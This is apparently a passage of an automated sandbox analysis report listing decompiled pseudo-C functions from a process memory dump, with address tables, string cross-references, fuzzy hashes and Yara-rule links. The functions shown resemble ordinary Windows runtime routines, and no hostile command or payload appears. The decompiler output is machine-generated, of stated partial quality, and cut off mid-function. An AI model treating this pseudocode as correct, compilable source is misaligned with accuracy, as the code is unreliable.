                          0x00fee6ea
                          0x00fee6f9
                          0x00fee70b
                          0x00fee70f
                          0x01045439
                          0x0104545e
                          0x0104545e
                          0x00000000
                          0x0104545e
                          0x0104543b
                          0x0104543e
                          0x01045440
                          0x01045445
                          0x01045472
                          0x01045475
                          0x0104548d
                          0x01045493
                          0x010454a9
                          0x00000000
                          0x00000000
                          0x010454ab
                          0x010454b4
                          0x010454bc
                          0x010454c8
                          0x010454de
                          0x010454fb
                          0x010454e0
                          0x010454e6
                          0x010454eb
                          0x010454eb
                          0x010454de
                          0x00000000
                          0x010454bc
                          0x01045477
                          0x0104547a
                          0x01045480
                          0x01045483
                          0x01045486
                          0x0104548b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0104548b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01045447
                          0x01045447
                          0x01045447
                          0x01045447
                          0x0104544e
                          0x00000000
                          0x00000000
                          0x01045450
                          0x01045452
                          0x01045455
                          0x0104545a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0104545c
                          0x0104546a
                          0x0104546d
                          0x0104546f
                          0x00000000
                          0x0104546f
                          0x00fee70f

                          Strings
                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FEE68C
                          • @, xrefs: 00FEE6C0
                          • InstallLanguageFallback, xrefs: 00FEE6DB
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                          • API String ID: 0-1757540487
                          • Opcode ID: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
                          • Instruction ID: ef00adae1cbc27d5b81346d2d65f49de794019e3bc350f53130d69b24f1b5569
                          • Opcode Fuzzy Hash: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
                          • Instruction Fuzzy Hash: A351A0B66043569BD711DF28C890AABB3E8BF88714F04097EF995D7240FB34DA04C7A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010AE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                          Download Yara Rule
                          C-Code - Quality: 60%
                          			E010AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E010ABBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E010ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E010AAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01029730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E010AA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E010AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01029730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E010AA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E010AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01002280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00FFB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00FFFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01007D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0109FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                          0x010ae547
                          0x010ae549
                          0x010ae54f
                          0x010ae553
                          0x010ae557
                          0x010ae55a
                          0x010ae55c
                          0x010ae55f
                          0x010ae561
                          0x010ae567
                          0x010ae56b
                          0x010ae7e2
                          0x00000000
                          0x010ae571
                          0x010ae575
                          0x010ae577
                          0x010ae57b
                          0x010ae57c
                          0x010ae57d
                          0x010ae57e
                          0x010ae57f
                          0x010ae588
                          0x010ae58f
                          0x010ae591
                          0x010ae592
                          0x010ae592
                          0x010ae596
                          0x010ae59e
                          0x010ae5a0
                          0x010ae5a6
                          0x010ae61d
                          0x010ae61d
                          0x010ae621
                          0x010ae623
                          0x010ae630
                          0x010ae630
                          0x010ae7e6
                          0x010ae7eb
                          0x010ae7ed
                          0x010ae7f4
                          0x010ae7fa
                          0x010ae7ff
                          0x010ae7ff
                          0x010ae80a
                          0x010ae812
                          0x010ae812
                          0x010ae5ab
                          0x010ae5b4
                          0x010ae5b9
                          0x010ae5be
                          0x010ae5c0
                          0x010ae5c2
                          0x010ae5c8
                          0x010ae5c9
                          0x010ae5cb
                          0x010ae5cc
                          0x010ae5d5
                          0x010ae5e4
                          0x010ae5f1
                          0x010ae5f8
                          0x010ae5f8
                          0x010ae5d5
                          0x010ae602
                          0x010ae616
                          0x010ae63d
                          0x010ae644
                          0x010ae64d
                          0x010ae652
                          0x010ae657
                          0x010ae659
                          0x010ae65b
                          0x010ae661
                          0x010ae662
                          0x010ae664
                          0x010ae665
                          0x010ae66e
                          0x010ae67d
                          0x010ae68a
                          0x010ae691
                          0x010ae691
                          0x010ae66e
                          0x010ae6b0
                          0x00000000
                          0x010ae6b6
                          0x010ae6bd
                          0x010ae6c7
                          0x010ae6d7
                          0x010ae6d9
                          0x010ae6db
                          0x010ae6de
                          0x010ae6e3
                          0x010ae6f3
                          0x010ae6fc
                          0x010ae700
                          0x010ae700
                          0x010ae704
                          0x010ae70a
                          0x010ae70a
                          0x010ae713
                          0x010ae716
                          0x010ae719
                          0x010ae720
                          0x010ae761
                          0x010ae76b
                          0x010ae774
                          0x010ae77a
                          0x010ae77a
                          0x010ae78a
                          0x010ae791
                          0x010ae799
                          0x010ae79b
                          0x010ae79f
                          0x010ae7aa
                          0x010ae7c0
                          0x010ae7ac
                          0x010ae7b2
                          0x010ae7b9
                          0x010ae7b9
                          0x010ae7c7
                          0x010ae806
                          0x00000000
                          0x010ae7c9
                          0x010ae7d1
                          0x010ae7d8
                          0x00000000
                          0x010ae7d8
                          0x00000000
                          0x00000000
                          0x010ae722
                          0x010ae72e
                          0x010ae748
                          0x010ae74c
                          0x010ae754
                          0x010ae756
                          0x010ae75c
                          0x010ae75c
                          0x00000000
                          0x010ae75c
                          0x010ae758
                          0x010ae758
                          0x00000000
                          0x010ae758
                          0x010ae750
                          0x00000000
                          0x00000000
                          0x010ae752
                          0x00000000
                          0x010ae752
                          0x010ae730
                          0x010ae735
                          0x010ae73d
                          0x010ae73f
                          0x00000000
                          0x00000000
                          0x010ae741
                          0x010ae741
                          0x00000000
                          0x010ae741
                          0x010ae739
                          0x00000000
                          0x00000000
                          0x010ae73b
                          0x00000000
                          0x010ae73b
                          0x010ae722
                          0x010ae720
                          0x010ae6b0
                          0x010ae618
                          0x00000000
                          0x010ae618

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: `$`
                          • API String ID: 0-197956300
                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                          • Instruction ID: ea66b2fc3411c237b1b37f46d7f50c541f365a237079b439334ed6c555d98530
                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                          • Instruction Fuzzy Hash: C891BF312043429FE764CEA9C841B6BBBE5BF84714F54896DF6D9CB280E774E904CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010651BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E010651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x10c05f0);
				E0103D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E010653CA(0);
						return E0103D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0102F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01003690(1, _t117, 0xfc1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0102AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01004620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0102AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0106500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01029860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                          0x010651be
                          0x010651c3
                          0x010651c8
                          0x010651cd
                          0x010651d0
                          0x010651d3
                          0x010651d8
                          0x010651db
                          0x010651de
                          0x010651e0
                          0x010651e3
                          0x010651e6
                          0x010651e8
                          0x01065342
                          0x01065351
                          0x01065356
                          0x0106535a
                          0x01065360
                          0x01065363
                          0x01065366
                          0x01065369
                          0x01065369
                          0x0106536b
                          0x0106536b
                          0x01065370
                          0x010653a3
                          0x010653a4
                          0x010653a6
                          0x010653ab
                          0x010653ab
                          0x010653ae
                          0x010653ae
                          0x010653b5
                          0x010653bf
                          0x010653bf
                          0x01065375
                          0x01065396
                          0x010653a0
                          0x010653a0
                          0x00000000
                          0x01065396
                          0x01065377
                          0x01065379
                          0x0106537f
                          0x0106538c
                          0x01065390
                          0x00000000
                          0x01065390
                          0x010651ee
                          0x010651f1
                          0x01065301
                          0x01065310
                          0x01065315
                          0x01065318
                          0x0106531b
                          0x01065320
                          0x0106532e
                          0x01065331
                          0x00000000
                          0x01065331
                          0x01065328
                          0x01065329
                          0x00000000
                          0x01065329
                          0x010651fa
                          0x01065235
                          0x01065236
                          0x01065239
                          0x0106523f
                          0x01065240
                          0x01065241
                          0x01065242
                          0x01065246
                          0x01065247
                          0x0106524e
                          0x01065251
                          0x01065267
                          0x01065269
                          0x0106526e
                          0x0106527d
                          0x0106527e
                          0x01065281
                          0x01065282
                          0x01065287
                          0x01065288
                          0x0106528a
                          0x0106528f
                          0x01065294
                          0x00000000
                          0x00000000
                          0x0106529a
                          0x0106529c
                          0x0106529e
                          0x0106529e
                          0x010652a4
                          0x010652b0
                          0x00000000
                          0x00000000
                          0x010652ba
                          0x010652bc
                          0x010652bc
                          0x010652d4
                          0x010652d9
                          0x010652dc
                          0x010652e1
                          0x00000000
                          0x00000000
                          0x010652e7
                          0x010652f4
                          0x00000000
                          0x010652f4
                          0x01065270
                          0x00000000
                          0x01065270
                          0x010651fc
                          0x010651fd
                          0x01065202
                          0x01065203
                          0x01065205
                          0x0106520a
                          0x0106520f
                          0x00000000
                          0x00000000
                          0x0106521b
                          0x01065226
                          0x0106522b
                          0x0106521d
                          0x0106521d
                          0x01065222
                          0x01065222
                          0x0106522d
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Legacy$UEFI
                          • API String ID: 2994545307-634100481
                          • Opcode ID: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
                          • Instruction ID: 122933dc0bdde9ee1c66bef31de420ef0877b5863a097cc5e82ea0c876e6fe7b
                          • Opcode Fuzzy Hash: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
                          • Instruction Fuzzy Hash: BF514D71A0061A9FDB25DFA8CD40BAEBBF8FF48740F14806DE689EB291D7719940CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E0100B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x10dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01007D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E010B8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01029E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0102B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0102CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01007D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E010B8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0102AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x10d8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x10d862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x10d8628; // 0x0
							_t116 =  *0x10d862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                          0x0100b94c
                          0x0100b956
                          0x0100b95c
                          0x0100b95e
                          0x0100b964
                          0x0100b969
                          0x0100b96d
                          0x0100b96d
                          0x0100b970
                          0x0100b974
                          0x0100b97a
                          0x0100badf
                          0x0100badf
                          0x0100bae2
                          0x0100bae4
                          0x0100bae6
                          0x0100baf0
                          0x01052cb8
                          0x0100baf6
                          0x0100baf6
                          0x0100baf6
                          0x0100bafd
                          0x0100bb1f
                          0x0100bb1f
                          0x0100baff
                          0x0100bb00
                          0x0100bb00
                          0x0100bb03
                          0x0100bb03
                          0x0100bacb
                          0x0100bacf
                          0x0100bad0
                          0x0100bad1
                          0x0100badc
                          0x0100badc
                          0x0100b980
                          0x0100b980
                          0x0100b988
                          0x0100b98b
                          0x0100b98d
                          0x0100b990
                          0x0100b993
                          0x0100b999
                          0x0100b99b
                          0x0100b9a1
                          0x0100b9a5
                          0x0100b9aa
                          0x0100b9b0
                          0x0100b9bb
                          0x0100b9c0
                          0x0100b9c3
                          0x0100b9ca
                          0x0100b9cc
                          0x0100b9cf
                          0x0100b9d3
                          0x0100b9d7
                          0x0100ba94
                          0x0100ba94
                          0x0100ba98
                          0x0100baa3
                          0x01052ccb
                          0x0100baa9
                          0x0100baa9
                          0x0100baa9
                          0x0100bab1
                          0x01052cd5
                          0x01052cdd
                          0x01052cdd
                          0x0100babb
                          0x0100babc
                          0x0100bac2
                          0x0100bac3
                          0x0100bac3
                          0x0100bac6
                          0x00000000
                          0x0100b9dd
                          0x0100b9dd
                          0x0100b9e7
                          0x0100b9e7
                          0x0100b9ec
                          0x0100b9ec
                          0x0100b9f1
                          0x0100b9f5
                          0x0100b9fa
                          0x0100ba00
                          0x0100ba0c
                          0x0100ba10
                          0x0100ba10
                          0x0100ba12
                          0x0100ba18
                          0x00000000
                          0x00000000
                          0x0100bb26
                          0x0100bb26
                          0x0100ba1e
                          0x0100ba1e
                          0x0100ba23
                          0x0100ba25
                          0x0100ba2c
                          0x0100ba30
                          0x0100ba35
                          0x0100ba35
                          0x0100ba41
                          0x0100ba46
                          0x0100ba4c
                          0x0100ba50
                          0x0100ba54
                          0x0100ba6a
                          0x0100ba6e
                          0x0100ba70
                          0x0100ba74
                          0x0100ba78
                          0x0100ba7a
                          0x0100ba7c
                          0x0100ba8e
                          0x0100ba90
                          0x0100ba92
                          0x0100bb14
                          0x0100bb14
                          0x0100bb16
                          0x0100bb16
                          0x00000000
                          0x0100ba7c
                          0x0100bb0a
                          0x0100bb0d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0100bb0f

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100B9A5
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 885266447-0
                          • Opcode ID: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
                          • Instruction ID: d3b2efc54865fe87708270c9f371d02c2dec173c6a7fff52a2a66bd7aa80037b
                          • Opcode Fuzzy Hash: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
                          • Instruction Fuzzy Hash: C6517775A08701CFE762CF6CC08092BBBE5FB88610F1489AEE9D587395D771E840CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FEB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E00FEB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x10bf7a8);
				E0103D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0103D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0102D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
